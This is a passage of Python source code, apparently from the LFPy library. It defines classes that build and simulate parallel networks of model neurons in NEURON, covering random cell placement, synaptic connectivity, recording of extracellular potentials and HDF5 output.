self.cells = [Cell(**cell_args) for gid in self.gids]
os.chdir(CWD)
else:
self.cells = [Cell(**cell_args) for gid in self.gids]
# position each cell's soma in space
self.soma_pos = self.draw_rand_pos(POP_SIZE=len(self.gids), **pop_args)
for i, cell in enumerate(self.cells):
cell.set_pos(**self.soma_pos[i])
# assign a random rotation around the z-axis of each cell
self.rotations = np.random.uniform(0, np.pi * 2, len(self.gids))
assert 'z' not in self.rotation_args.keys()
for i, cell in enumerate(self.cells):
cell.set_rotation(z=self.rotations[i], **self.rotation_args)
# assign gid to each cell
for gid, cell in zip(self.gids, self.cells):
cell.gid = gid
# gather gids, soma positions and cell rotations to RANK 0, and write
# as structured array.
if RANK == 0:
populationData = flattenlist(COMM.gather(
zip(self.gids, self.soma_pos, self.rotations)))
# create structured array for storing data
dtype = [('gid', 'i8'), ('x', float), ('y', float), ('z', float),
('x_rot', float), ('y_rot', float), ('z_rot', float)]
popDataArray = np.empty((len(populationData, )), dtype=dtype)
for i, (gid, pos, z_rot) in enumerate(populationData):
popDataArray[i]['gid'] = gid
popDataArray[i]['x'] = pos['x']
popDataArray[i]['y'] = pos['y']
popDataArray[i]['z'] = pos['z']
popDataArray[i]['x_rot'] = np.pi / 2
popDataArray[i]['y_rot'] = 0.
popDataArray[i]['z_rot'] = z_rot
# Dump to hdf5 file, append to file if it exists
f = h5py.File(os.path.join(self.OUTPUTPATH,
'cell_positions_and_rotations.h5'), 'a')
# delete old entry if it exist
if self.name in f.keys():
del f[self.name]
assert self.name not in f.keys()
f[self.name] = popDataArray
f.close()
else:
COMM.gather(zip(self.gids, self.soma_pos, self.rotations))
# sync
COMM.Barrier()
def draw_rand_pos(self, POP_SIZE, radius, loc, scale, cap=None):
"""
Draw some random location for POP_SIZE cells within radius radius,
at mean depth loc and standard deviation scale.
Returned argument is a list of dicts [{'x', 'y', 'z'},].
Parameters
----------
POP_SIZE: int
Population size
radius: float
Radius of population.
loc: float
expected mean depth of somas of population.
scale: float
expected standard deviation of depth of somas of population.
cap: None, float or length to list of floats
if float, cap distribution between [loc-cap, loc+cap),
if list, cap distribution between [loc-cap[0], loc+cap[1]]
Returns
-------
soma_pos: list
List of dicts of len POP_SIZE
where dict have keys x, y, z specifying
xyz-coordinates of cell at list entry `i`.
"""
x = np.empty(POP_SIZE)
y = np.empty(POP_SIZE)
z = np.empty(POP_SIZE)
for i in range(POP_SIZE):
x[i] = (np.random.rand() - 0.5) * radius * 2
y[i] = (np.random.rand() - 0.5) * radius * 2
while np.sqrt(x[i]**2 + y[i]**2) >= radius:
x[i] = (np.random.rand() - 0.5) * radius * 2
y[i] = (np.random.rand() - 0.5) * radius * 2
z = np.random.normal(loc=loc, scale=scale, size=POP_SIZE)
if cap is not None:
if type(cap) in [float, np.float32, np.float64]:
while not np.all((z >= loc - cap) & (z < loc + cap)):
inds = (z < loc - cap) ^ (z > loc + cap)
z[inds] = np.random.normal(loc=loc, scale=scale,
size=inds.sum())
elif isinstance(cap, list):
assert len(cap) == 2, \
'cap = {} is not a length 2 list'.format(float)
while not np.all((z >= loc - cap[0]) & (z < loc + cap[1])):
inds = (z < loc - cap[0]) ^ (z > loc + cap[1])
z[inds] = np.random.normal(loc=loc, scale=scale,
size=inds.sum())
else:
raise Exception('cap = {} is not None'.format(float),
'a float or length 2 list of floats')
soma_pos = []
for i in range(POP_SIZE):
soma_pos.append({'x': x[i], 'y': y[i], 'z': z[i]})
return soma_pos
class Network(object):
"""
Network class, creating distributed populations of cells of
type Cell and handling connections between cells in the respective
populations.
Parameters
----------
dt: float
Simulation timestep size
tstart: float
Start time of simulation
tstop: float
End time of simulation
v_init: float
Membrane potential set at first timestep across all cells
celsius: float
Global control of temperature, affect channel kinetics.
It will also be forced when creating the different Cell objects, as
LFPy.Cell and LFPy.TemplateCell also accept the same keyword
argument.
verbose: bool
if True, print out misc. messages
"""
def __init__(
self,
dt=0.1,
tstart=0.,
tstop=1000.,
v_init=-65.,
celsius=6.3,
OUTPUTPATH='example_parallel_network',
verbose=False):
# set attributes
self.dt = dt
self.tstart = tstart
self.tstop = tstop
self.v_init = v_init
self.celsius = celsius
self.OUTPUTPATH = OUTPUTPATH
self.verbose = verbose
# we need NEURON's ParallelContext for communicating NetCon events
self.pc = neuron.h.ParallelContext()
# create empty list for connections between cells (not to be confused
# with each cell's list of netcons _hoc_netconlist)
self._hoc_netconlist = neuron.h.List()
# The different populations in the Network will be collected in
# a dictionary of NetworkPopulation object, where the keys represent
# population names. The names are also put in a list ordered according
# to the order populations are created in (as some operations rely on
# this particular order)
self.populations = dict()
self.population_names = []
def create_population(self, CWD=None, CELLPATH=None, Cell=NetworkCell,
POP_SIZE=4, name='L5PC',
cell_args=None, pop_args=None,
rotation_args=None):
"""
Create and append a distributed POP_SIZE-sized population of cells of
type Cell with the corresponding name. Cell-object references, gids on
this RANK, population size POP_SIZE and names will be added to the
lists Network.gids, Network.cells, Network.sizes and Network.names,
respectively
Parameters
----------
CWD: path
Current working directory
CELLPATH: path
Relative path from CWD to source files for cell model
(morphology, hoc routines etc.)
Cell: class
class defining a Cell-like object, see class NetworkCell
POP_SIZE: int
number of cells in population
name: str
population name reference
cell_args: dict
keys and values for Cell object
pop_args: dict
keys and values for Network.draw_rand_pos assigning cell positions
rotation_arg: dict
default cell rotations around x and y axis on the form
{ 'x': np.pi/2, 'y': 0 }. Can only have the keys 'x' and 'y'.
Cells are randomly rotated around z-axis using the
Cell.set_rotation method.
"""
assert name not in self.populations.keys(), \
'population name {} already taken'.format(name)
# compute the first global id of this new population, based
# on population sizes of existing populations
first_gid = 0
for p in self.populations.values():
first_gid += p.POP_SIZE
# create NetworkPopulation object
population = NetworkPopulation(
CWD=CWD,
CELLPATH=CELLPATH,
first_gid=first_gid,
Cell=Cell,
POP_SIZE=POP_SIZE,
name=name,
cell_args=cell_args,
pop_args=pop_args,
rotation_args=rotation_args,
OUTPUTPATH=self.OUTPUTPATH)
# associate gids of cells on this RANK such that NEURON can look up
# at which RANK different cells are created when connecting the network
for gid in population.gids:
self.pc.set_gid2node(gid, RANK)
# Prepare connection targets by iterating over local neurons in pop.
for gid, cell in zip(population.gids, population.cells):
# attach NetCon source (spike detektor) to each cell's soma with no
# target to cell gid
cell.create_spike_detector(None)
# assosiate cell gid with the NetCon source
self.pc.cell(gid, cell._hoc_sd_netconlist[-1])
# record spike events
population.spike_vectors.append(neuron.h.Vector())
cell._hoc_sd_netconlist[-1].record(population.spike_vectors[-1])
# add population object to dictionary of populations
self.populations[name] = population
# append population name to list (Network.populations.keys() not
# unique)
self.population_names.append(name)
def get_connectivity_rand(self, pre='L5PC', post='L5PC', connprob=0.2):
"""
Dummy function creating a (boolean) cell to cell connectivity matrix
between pre and postsynaptic populations.
Connections are drawn randomly between presynaptic cell gids in
population 'pre' and postsynaptic cell gids in 'post' on this RANK with
a fixed connection probability. self-connections are disabled if
presynaptic and postsynaptic populations are the same.
Parameters
----------
pre: str
presynaptic population name
post: str
postsynaptic population name
connprob: float in [0, 1]
connection probability, connections are drawn on random
Returns
-------
ndarray, dtype bool
n_pre x n_post array of connections between n_pre presynaptic
neurons and n_post postsynaptic neurons on this RANK. Entries
with True denotes a connection.
"""
n_pre = self.populations[pre].POP_SIZE
gids = np.array(self.populations[post].gids).astype(int)
# first check if there are any postsyn cells on this RANK
if gids.size > 0:
# define incoming connections for cells on this RANK
C = np.random.binomial(n=1, p=connprob,
size=(n_pre, gids.size)
).astype(bool)
if pre == post:
# avoid self connections.
gids_pre, gids_post = np.where(C)
gids_pre += self.populations[pre].first_gid
gids_post *= SIZE # asssume round-robin distribution of gids
gids_post += self.populations[post].gids[0]
inds = gids_pre != gids_post
gids_pre = gids_pre[inds]
gids_pre -= self.populations[pre].first_gid
gids_post = gids_post[inds]
gids_post -= self.populations[post].gids[0]
gids_post //= SIZE
c = np.c_[gids_pre, gids_post]
# create boolean matrix
C = ss.csr_matrix((np.ones(gids_pre.shape[0], dtype=bool),
(c[:, 0], c[:, 1])),
shape=(n_pre, gids.size), dtype=bool)
return C.toarray()
else:
return C
else:
return np.zeros((n_pre, 0), dtype=bool)
def connect(self, pre, post, connectivity,
syntype=neuron.h.ExpSyn,
synparams=dict(tau=2., e=0.),
weightfun=np.random.normal,
weightargs=dict(loc=0.1, scale=0.01),
minweight=0,
delayfun=stats.truncnorm,
delayargs=dict(a=0.3, b=np.inf, loc=2, scale=0.2),
mindelay=None,
multapsefun=stats.truncnorm,
multapseargs=dict(a=(1 - 4) / 1.,
b=(10 - 4) / 1,
loc=4,
scale=1),
syn_pos_args=dict(section=['soma', 'dend', 'apic'],
fun=[stats.norm] * 2,
funargs=[dict(loc=0, scale=100)] * 2,
funweights=[0.5] * 2,
z_min=-1E6, z_max=1E6,
),
save_connections=False,
):
"""
Connect presynaptic cells to postsynaptic cells. Connections are
drawn from presynaptic cells to postsynaptic cells, hence connectivity
array must only be specified for postsynaptic units existing on this
RANK.
Parameters
----------
pre: str
presynaptic population name
post: str
postsynaptic population name
connectivity: ndarray / (scipy.sparse array)
boolean connectivity matrix between pre and post.
syntype: hoc.HocObject
reference to NEURON synapse mechanism, e.g., ``neuron.h.ExpSyn``
synparams: dict
dictionary of parameters for synapse mechanism, keys 'e', 'tau'
etc.
weightfun: function
function used to draw weights from a numpy.random distribution
weightargs: dict
parameters passed to weightfun
minweight: float,
minimum weight in units of nS
delayfun: function
function used to draw delays from a subclass of
scipy.stats.rv_continuous or numpy.random distribution
delayargs: dict
parameters passed to ``delayfun``
mindelay: float,
minimum delay in multiples of dt. Ignored if ``delayfun`` is an
inherited from ``scipy.stats.rv_continuous``
multapsefun: function or None
function reference, e.g., ``scipy.stats.rv_continuous`` used to
draw a number of synapses for a cell-to-cell connection.
If None, draw only one connection
multapseargs: dict
arguments passed to multapsefun
syn_pos_args: dict
arguments passed to inherited ``LFPy.Cell`` method
``NetworkCell.get_rand_idx_area_and_distribution_norm`` to find
synapse locations.
save_connections: bool
if True (default False), save instantiated connections to HDF5 file
``Network.OUTPUTPATH/synapse_connections.h5`` as dataset
``<pre>:<post>`` using a structured ndarray with dtype
::
[('gid_pre'), ('gid', 'i8'), ('weight', 'f8'), ('delay', 'f8'),
('sec', 'U64'), ('sec.x', 'f8'),
('x', 'f8'), ('y', 'f8'), ('z', 'f8')],
where ``gid_pre`` is presynapic cell id,
``gid`` is postsynaptic cell id,
``weight`` connection weight, ``delay`` connection delay,
``sec`` section name, ``sec.x`` relative location on section,
and ``x``, ``y``, ``z`` the corresponding
midpoint coordinates of the target compartment.
Returns
-------
list
Length 2 list with ndarrays [conncount, syncount] with numbers of
instantiated connections and synapses.
Raises
------
DeprecationWarning
if ``delayfun`` is not a subclass of ``scipy.stats.rv_continuous``
"""
# check if delayfun is a scipy.stats.rv_continuous like function that
# provides a function `rvs` for random variates.
# Otherwise, raise some warnings
if not hasattr(delayfun, 'rvs'):
warn(f'argument delayfun={delayfun.__str__()} do not appear ' +
'scipy.stats.rv_continuous or scipy.stats.rv_discrete like ' +
'and will be deprecated in the future')
else:
if mindelay is not None:
warn(f'mindelay={mindelay} not usable with ' +
f'delayfun={delayfun.__str__()}')
# set up connections from all cells in presynaptic to post across RANKs
n0 = self.populations[pre].first_gid
# gids of presynaptic neurons:
gids_pre = np.arange(n0, n0 + self.populations[pre].POP_SIZE)
# count connections and synapses made on this RANK
conncount = connectivity.astype(int).sum()
syncount = 0
# keep track of synapse positions for this connect
# call on this rank such that these can be communicated and stored
syn_idx_pos = []
# iterate over gids on this RANK and create connections
for i, (gid_post, cell) in enumerate(zip(self.populations[post].gids,
self.populations[post].cells)
):
# do NOT iterate over all possible presynaptic neurons
for gid_pre in gids_pre[connectivity[:, i]]:
# throw a warning if sender neuron is identical to receiving
# neuron
if gid_post == gid_pre:
print(
'connecting cell w. gid {} to itself (RANK {})'.format(
gid_post, RANK))
# assess number of synapses
if multapsefun is None:
nidx = 1
else:
if hasattr(multapsefun, 'pdf'):
# assume we're dealing with a scipy.stats.rv_continuous
# like method. Then evaluate pdf at positive integer
# values and feed as custom scipy.stats.rv_discrete
# distribution
d = multapsefun(**multapseargs)
# number of multapses must be on interval [1, 100]
xk = np.arange(1, 100)
pk = d.pdf(xk)
pk /= pk.sum()
nidx = stats.rv_discrete(values=(xk, pk)).rvs()
# this aint pretty:
mssg = (
'multapsefun: '
+ multapsefun(**multapseargs).__str__()
+ f'w. multapseargs: {multapseargs} resulted '
+ f'in {nidx} synapses'
)
assert nidx >= 1, mssg
elif hasattr(multapsefun, 'pmf'):
# assume we're dealing with a scipy.stats.rv_discrete
# like method that can be used to generate random
# variates directly
nidx = multapsefun(**multapseargs).rvs()
mssg = (
f'multapsefun: {multapsefun().__str__()} w. '
+ f'multapseargs: {multapseargs} resulted in '
+ f'{nidx} synapses'
)
assert nidx >= 1, mssg
else:
warn(f'multapsefun{multapsefun.__str__()} will be ' +
'deprecated. Use scipy.stats.rv_continuous or ' +
'scipy.stats.rv_discrete like methods instead')
nidx = 0
j = 0
while nidx <= 0 and j < 1000:
nidx = int(round(multapsefun(**multapseargs)))
j += 1
if j == 1000:
raise Exception(
'change multapseargs as no positive '
'synapse # was found in 1000 trials')
# find synapse locations and corresponding section names
idxs = cell.get_rand_idx_area_and_distribution_norm(
nidx=nidx, **syn_pos_args)
secs = cell.get_idx_name(idxs)
# draw weights
weights = weightfun(size=nidx, **weightargs)
# redraw weights less that minweight
while np.any(weights < minweight):
j = weights < minweight
weights[j] = weightfun(size=j.sum(), **weightargs)
# draw delays
if hasattr(delayfun, 'rvs'):
delays = delayfun(**delayargs).rvs(size=nidx)
# check that all delays are > dt
try:
assert np.all(delays >= self.dt)
except AssertionError as ae:
raise ae(
f'the delayfun parameter a={delayargs["a"]} '
+ f'resulted in delay less than dt={self.dt}'
)
else:
delays = delayfun(size=nidx, **delayargs)
# redraw delays shorter than mindelay
while np.any(delays < mindelay):
j = delays < mindelay
delays[j] = delayfun(size=j.sum(), **delayargs)
for i, ((idx, secname, secx), weight, delay) in enumerate(
zip(secs, weights, delays)):
cell.create_synapse(
cell,
# TODO: Find neater way of accessing
# Section reference, this looks slow
sec=list(
cell.allseclist)[
np.where(
np.array(
cell.allsecnames) == secname)[0][0]],
x=secx,
syntype=syntype,
synparams=synparams)
# connect up NetCon object
nc = self.pc.gid_connect(gid_pre, cell.netconsynapses[-1])
nc.weight[0] = weight
nc.delay = delays[i]
self._hoc_netconlist.append(nc)
# store also synapse indices allowing for computing LFPs
# from syn.i
cell.synidx.append(idx)
# store gid and xyz-coordinate of synapse positions
syn_idx_pos.append((gid_pre,
cell.gid,
weight,
delays[i],
secname,
secx,
cell.x[idx].mean(axis=-1),
cell.y[idx].mean(axis=-1),
cell.z[idx].mean(axis=-1)))
syncount += nidx
conncount = COMM.reduce(conncount, op=MPI.SUM, root=0)
syncount = COMM.reduce(syncount, op=MPI.SUM, root=0)
if RANK == 0:
print('Connected population {} to {}'.format(pre, post),
'by {} connections and {} synapses'.format(conncount,
syncount))
else:
conncount = None
syncount = None
# gather and write syn_idx_pos data
if save_connections:
if RANK == 0:
synData = flattenlist(COMM.gather(syn_idx_pos))
# convert to structured array
dtype = [('gid_pre', 'i8'),
('gid', 'i8'),
('weight', 'f8'),
('delay', 'f8'),
('sec', 'S64'),
('sec.x', 'f8'),
('x', 'f8'),
('y', 'f8'),
('z', 'f8')]
synDataArray = np.empty((len(synData), ), dtype=dtype)
for i, (gid_pre, gid, weight, delay, secname, secx, x, y, z
) in enumerate(synData):
synDataArray[i]['gid_pre'] = gid_pre
synDataArray[i]['gid'] = gid
synDataArray[i]['weight'] = weight
synDataArray[i]['delay'] = delay
synDataArray[i]['sec'] = secname
synDataArray[i]['sec.x'] = secx
synDataArray[i]['x'] = x
synDataArray[i]['y'] = y
synDataArray[i]['z'] = z
# Dump to hdf5 file, append to file if entry exists
with h5py.File(os.path.join(self.OUTPUTPATH,
'synapse_connections.h5'),
'a') as f:
key = '{}:{}'.format(pre, post)
if key in f.keys():
del f[key]
assert key not in f.keys()
f[key] = synDataArray
# save global connection data (synapse type/parameters)
# equal for all synapses
try:
grp = f.create_group('synparams')
except ValueError:
grp = f['synparams']
try:
subgrp = grp.create_group(key)
except ValueError:
subgrp = grp[key]
subgrp['mechanism'] = syntype.__str__().strip('()')
for key, value in synparams.items():
subgrp[key] = value
else:
COMM.gather(syn_idx_pos)
return COMM.bcast([conncount, syncount])
def enable_extracellular_stimulation(self, electrode, t_ext=None, n=1,
seed=None):
raise NotImplementedError()
def simulate(self, probes=None,
rec_imem=False, rec_vmem=False,
rec_ipas=False, rec_icap=False,
rec_isyn=False, rec_vmemsyn=False, rec_istim=False,
rec_pop_contributions=False,
rec_variables=[], variable_dt=False, atol=0.001,
to_memory=True, to_file=False,
file_name='OUTPUT.h5',
**kwargs):
"""
This is the main function running the simulation of the network model.
Parameters
----------
probes: list of :obj:, optional
None or list of LFPykit.RecExtElectrode like object instances that
each have a public method `get_transformation_matrix` returning
a matrix that linearly maps each compartments' transmembrane
current to corresponding measurement as
.. math:: \\mathbf{P} = \\mathbf{M} \\mathbf{I}
rec_imem: bool
If true, segment membrane currents will be recorded
If no electrode argument is given, it is necessary to
set rec_imem=True in order to calculate LFP later on.
Units of (nA).
rec_vmem: bool
record segment membrane voltages (mV)
rec_ipas: bool
record passive segment membrane currents (nA)
rec_icap: bool
record capacitive segment membrane currents (nA)
rec_isyn: bool
record synaptic currents of from Synapse class (nA)
rec_vmemsyn: bool
record membrane voltage of segments with Synapse (mV)
rec_istim: bool
record currents of StimIntraElectrode (nA)
rec_pop_contributions: bool
If True, compute and return single-population contributions to
the extracellular potential during simulation time
rec_variables: list of str
variables to record, i.e arg=['cai', ]
variable_dt: boolean
use variable timestep in NEURON. Can not be combimed with `to_file`
atol: float
absolute tolerance used with NEURON variable timestep
to_memory: bool
Simulate to memory. Only valid with `probes=[<probe>, ...]`, which
store measurements to -> <probe>.data
to_file: bool
only valid with `probes=[<probe>, ...]`, saves measurement in
hdf5 file format.
file_name: str
If to_file is True, file which measurements will be
written to. The file format is HDF5, default is "OUTPUT.h5", put
in folder Network.OUTPUTPATH
**kwargs: keyword argument dict values passed along to function
`__run_simulation_with_probes()`, containing some or all of
the boolean flags: `use_ipas`, `use_icap`, `use_isyn`
(defaulting to `False`).
Returns
-------
events
Dictionary with keys `times` and `gids`, where values are
ndarrays with detected spikes and global neuron identifiers
Raises
------
Exception
if `CVode().use_fast_imem()` method not found
AssertionError
if rec_pop_contributions==True and probes==None
"""
# set up integrator, use the CVode().fast_imem method by default
# as it doesn't hurt sim speeds much if at all.
cvode = neuron.h.CVode()
try:
cvode.use_fast_imem(1)
except AttributeError:
raise Exception('neuron.h.CVode().use_fast_imem() not found. '
'Please update NEURON to v.7.4 or newer')
# test some of the inputs
if probes is None:
assert rec_pop_contributions is False, \
'rec_pop_contributions can not be True when probes is None'
if not variable_dt:
dt = self.dt
else:
dt = None
for name in self.population_names:
for cell in self.populations[name].cells:
cell._set_soma_volt_recorder(dt)
if rec_imem:
cell._set_imem_recorders(dt)
if rec_vmem:
cell._set_voltage_recorders(dt)
if rec_ipas:
cell._set_ipas_recorders(dt)
if rec_icap:
cell._set_icap_recorders(dt)
if len(rec_variables) > 0:
cell._set_variable_recorders(rec_variables)
# run fadvance until t >= tstop, and calculate LFP if asked for
if probes is None and not rec_pop_contributions and not to_file:
if not rec_imem:
if self.verbose:
print("rec_imem==False, not recording membrane currents!")
self.__run_simulation(cvode, variable_dt, atol)
else:
self.__run_simulation_with_probes(
cvode=cvode,
probes=probes,
variable_dt=variable_dt,
atol=atol,
to_memory=to_memory,
to_file=to_file,
file_name='tmp_output_RANK_{:03d}.h5',
rec_pop_contributions=rec_pop_contributions,
**kwargs)
for name in self.population_names:
for cell in self.populations[name].cells:
# somatic trace
cell.somav = np.array(cell.somav)
if rec_imem:
cell._calc_imem()
if rec_ipas:
cell._calc_ipas()
if rec_icap:
cell._calc_icap()
if rec_vmem:
cell._collect_vmem()
if rec_isyn:
cell._collect_isyn()
if rec_vmemsyn:
cell._collect_vsyn()
if rec_istim:
cell._collect_istim()
if len(rec_variables) > 0:
cell._collect_rec_variables(rec_variables)
if hasattr(cell, '_hoc_netstimlist'):
del cell._hoc_netstimlist
# Collect spike trains across all RANKs to RANK 0
for name in self.population_names:
population = self.populations[name]
for i in range(len(population.spike_vectors)):
population.spike_vectors[i] = \
np.array(population.spike_vectors[i])
if RANK == 0:
times = []
gids = []
for i, name in enumerate(self.population_names):
times.append([])
gids.append([])
times[i] += [x for x in self.populations[name].spike_vectors]
gids[i] += [x for x in self.populations[name].gids]
for j in range(1, SIZE):
times[i] += COMM.recv(source=j, tag=13)
gids[i] += COMM.recv(source=j, tag=14)
else:
times = None
gids = None
for name in self.population_names:
COMM.send([x for x in self.populations[name].spike_vectors],
dest=0, tag=13)
COMM.send([x for x in self.populations[name].gids],
dest=0, tag=14)
# create final output file, summing up single RANK output from
# temporary files
if to_file and probes is not None:
op = MPI.SUM
fname = os.path.join(self.OUTPUTPATH,
'tmp_output_RANK_{:03d}.h5'.format(RANK))
f0 = h5py.File(fname, 'r')
if RANK == 0:
f1 = h5py.File(os.path.join(self.OUTPUTPATH, file_name), 'w')
dtype = []
for key, value in f0[list(f0.keys())[0]].items():
dtype.append((str(key), float))
for grp in f0.keys():
if RANK == 0:
# get shape from the first dataset
# (they should all be equal):
for value in f0[grp].values():
shape = value.shape
continue
f1[grp] = np.zeros(shape, dtype=dtype)
for key, value in f0[grp].items():
if RANK == 0:
recvbuf = np.zeros(shape, dtype=float)
else:
recvbuf = None
COMM.Reduce(value[()].astype(float), recvbuf,
op=op, root=0)
if RANK == 0:
f1[grp][key] = recvbuf
f0.close()
if RANK == 0:
f1.close()
os.remove(fname)
if probes is not None:
if to_memory:
# communicate and sum up measurements on each probe before
# returing spike times and corresponding gids:
for probe in probes:
probe.data = ReduceStructArray(probe.data)
return dict(times=times, gids=gids)
def __create_network_dummycell(self):
"""
set up parameters for a DummyCell object, allowing for computing
the sum of all single-cell LFPs at each timestep, essentially
creating one supercell with all segments of all cell objects
present on this RANK.
"""
# compute the total number of segments per population on this RANK
nsegs = [[cell.totnsegs for cell in self.populations[name].cells]
for name in self.population_names]
for i, nseg in enumerate(nsegs):
if nseg == []:
nsegs[i] = [0]
for i, y in enumerate(nsegs):
nsegs[i] = np.sum(y)
nsegs = np.array(nsegs, dtype=int)
totnsegs = nsegs.sum()
x = np.empty((0, 2))
y = np.empty((0, 2))
z = np.empty((0, 2))
d = np.array([])
area = np.array([])
length = np.array([])
somainds = np.array([], dtype=int)
nseg = 0
for name in self.population_names:
for cell in self.populations[name].cells:
x = np.r_[x, cell.x]
y = np.r_[y, cell.y]
z = np.r_[z, cell.z]
d = np.r_[d, cell.d]
area = np.r_[area, cell.area]
length = np.r_[length, cell.length]
somainds = np.r_[somainds, cell.get_idx("soma") + nseg]
nseg += cell.totnsegs
# return number of segments per population and DummyCell object
return nsegs, DummyCell(totnsegs, x, y, z, d, area, length, somainds)
def __run_simulation(self, cvode, variable_dt=False, atol=0.001):
"""
Running the actual simulation in NEURON, simulations in NEURON
are now interruptable.
Parameters
----------
cvode: neuron.h.CVode() object
variable_dt: bool
switch for variable-timestep method
atol: float
absolute tolerance with CVode for variable time-step method
"""
# set maximum integration step, it is necessary for communication of
# spikes across RANKs to occur.
self.pc.set_maxstep(10)
# time resolution
neuron.h.dt = self.dt
# needed for variable dt method
if variable_dt:
cvode.active(1)
cvode.atol(atol)
else:
cvode.active(0)
# initialize state
neuron.h.finitialize(self.v_init * units.mV)
# initialize current- and record
if cvode.active():
cvode.re_init()
else:
neuron.h.fcurrent()
neuron.h.frecord_init()
# Starting simulation at tstart
neuron.h.t = self.tstart
# only needed if LFPy.Synapse classes are used.
for name in self.population_names:
for cell in self.populations[name].cells:
cell._load_spikes()
# advance simulation until tstop
neuron.h.continuerun(self.tstop * units.ms)
def __run_simulation_with_probes(self, cvode,
probes=None,
variable_dt=False,
atol=0.001,
rtol=0.,
to_memory=True,
to_file=False,
file_name=None,
use_ipas=False, use_icap=False,
use_isyn=False,
rec_pop_contributions=False
):
"""
Running the actual simulation in NEURON with list of probes.
Each object in `probes` must have a public method
`get_transformation_matrix` which returns a linear mapping of
transmembrane currents to corresponding measurement.
Parameters
----------
cvode: neuron.h.CVode() object
probes: list of :obj:, optional
None or list of LFPykit.RecExtElectrode like object instances that
each have a public method `get_transformation_matrix` returning
a matrix that linearly maps each compartments' transmembrane
current to corresponding measurement as
.. math:: \\mathbf{P} = \\mathbf{M} \\mathbf{I}
variable_dt: bool
switch for variable-timestep method
atol: float
absolute tolerance with CVode for variable time-step method
rtol: float
relative tolerance with CVode for variable time-step method
to_memory: bool
Boolean flag for computing extracellular potentials,
default is True.
If True, the corresponding <probe>.data attribute will be set.
to_file: bool or None
Boolean flag for computing extracellular potentials to file
<OUTPUTPATH/file_name>, default is False. Raises an Exception if
`to_memory` is True.
file_name: formattable str
If to_file is True, file which extracellular potentials will be
written to. The file format is HDF5, default is
"output_RANK_{:03d}.h5". The output is written per RANK, and the
RANK # will be inserted into the corresponding file name.
use_ipas: bool
if True, compute the contribution to extracellular potentials
across the passive leak channels embedded in the cells membranes
summed over populations
use_icap: bool
if True, compute the contribution to extracellular potentials
across the membrane capacitance embedded in the cells membranes
summed over populations
use_isyn: bool
if True, compute the contribution to extracellular potentials
across the excitatory and inhibitory synapses embedded in the cells
membranes summed over populations
rec_pop_contributions: bool
if True, compute and return single-population contributions to the
extracellular potential during each time step of the simulation
Returns
-------
Raises
------
Exception:
- `if to_memory == to_file == True`
- `if to_file == True and file_name is None`
- `if to_file == variable_dt == True`
- `if <probe>.cell is not None`
"""
if to_memory and to_file:
raise Exception('to_memory and to_file can not both be True')
if to_file and file_name is None:
raise Exception
# create a dummycell object lumping together needed attributes
# for calculation of extracellular potentials etc. The population_nsegs
# array is used to slice indices such that single-population
# contributions to the potential can be calculated.
population_nsegs, network_dummycell = self.__create_network_dummycell()
# set cell attribute on each probe, assuming that each probe was
# instantiated with argument cell=None
for probe in probes:
if probe.cell is None:
probe.cell = network_dummycell
else:
raise Exception('{}.cell!=None'.format(probe.__class__))
# create list of transformation matrices; one for each probe
transforms = []
if probes is not None:
for probe in probes:
transforms.append(probe.get_transformation_matrix())
# reset probe.cell to None, as it is no longer needed
for probe in probes:
probe.cell = None
# set maximum integration step, it is necessary for communication of
# spikes across RANKs to occur.
# NOTE: Should this depend on the minimum delay in the network?
self.pc.set_maxstep(10)
# Initialize NEURON simulations of cell object
neuron.h.dt = self.dt
# needed for variable dt method
if variable_dt:
cvode.active(1)
cvode.atol(atol)
else:
cvode.active(0)
# initialize state
neuron.h.finitialize(self.v_init * units.mV)
# use fast calculation of transmembrane currents
cvode.use_fast_imem(1)
# initialize current- and record
if cvode.active():
cvode.re_init()
else:
neuron.h.fcurrent()
neuron.h.frecord_init()
# Starting simulation at tstart
neuron.h.t = self.tstart
# create list of cells across all populations to simplify loops
cells = []
for name in self.population_names:
cells += self.populations[name].cells
# load spike times from NetCon, only needed if LFPy.Synapse class
# is used
for cell in cells:
cell._load_spikes()
# define data type for structured arrays dependent on the boolean
# arguments
dtype = [('imem', float)]
if use_ipas:
dtype += [('ipas', float)]
if use_icap:
dtype += [('icap', float)]
if use_isyn:
dtype += [('isyn_e', float), ('isyn_i', float)]
if rec_pop_contributions:
dtype += list(zip(self.population_names,
[float] * len(self.population_names)))
# setup list of structured arrays for all extracellular potentials
# at each contact from different source terms and subpopulations
if to_memory:
for probe, M in zip(probes, transforms):
probe.data = np.zeros((M.shape[0],
int(self.tstop / self.dt) + 1),
dtype=dtype)
# signals for each probe will be stored here during simulations
if to_file:
# ensure right ending:
if file_name.split('.')[-1] != 'h5':
file_name += '.h5'
outputfile = h5py.File(os.path.join(self.OUTPUTPATH,
file_name.format(RANK)), 'w')
# define unique group names for each probe
names = []
for probe, M in zip(probes, transforms):
name = probe.__class__.__name__
i = 0
while True:
if name + '{}'.format(i) not in names:
names.append(name + '{}'.format(i))
break
i += 1
# create groups
for i, (name, probe, M) in enumerate(zip(names, probes,
transforms)):
# can't do it this way until h5py issue #740
# (https://github.com/h5py/h5py/issues/740) is fixed:
# outputfile['{}'.format(name)] = np.zeros((M.shape[0],
# int(network.tstop / network.dt) + 1), dtype=dtype)
probe.data = outputfile.create_group('{}'.format(name))
for key, val in dtype:
probe.data[key] = np.zeros((M.shape[0],
int(self.tstop / self.dt)
+ 1),
dtype=val)
# temporary vector to store membrane currents at each timestep:
imem = np.zeros(network_dummycell.totnsegs, dtype=dtype)
def get_imem(imem):
'''helper function to gather currents across all cells
on this RANK'''
i = 0
totnsegs = 0
if use_isyn:
imem['isyn_e'] = 0. # must reset these for every iteration
imem['isyn_i'] = 0. # because we sum over synapses
for cell in cells:
for sec in cell.allseclist:
for seg in sec:
imem['imem'][i] = seg.i_membrane_
if use_ipas:
imem['ipas'][i] = seg.i_pas
if use_icap:
imem['icap'][i] = seg.i_cap
i += 1
if use_isyn:
for idx, syn in zip(cell.synidx, cell.netconsynapses):
if hasattr(syn, 'e') and syn.e > -50:
imem['isyn_e'][idx + totnsegs] += syn.i
else:
imem['isyn_i'][idx + totnsegs] += syn.i
totnsegs += cell.totnsegs
return imem
# run fadvance until time limit, and calculate LFPs for each timestep
tstep = 0
while neuron.h.t < self.tstop:
if neuron.h.t >= 0:
imem = get_imem(imem)
for j, (probe, M) in enumerate(zip(probes, transforms)):
probe.data['imem'][:, tstep] = M @ imem['imem']
if use_ipas:
probe.data['ipas'][:, tstep] = \
M @ (imem['ipas'] * network_dummycell.area * 1E-2)
if use_icap:
probe.data['icap'][:, tstep] = \
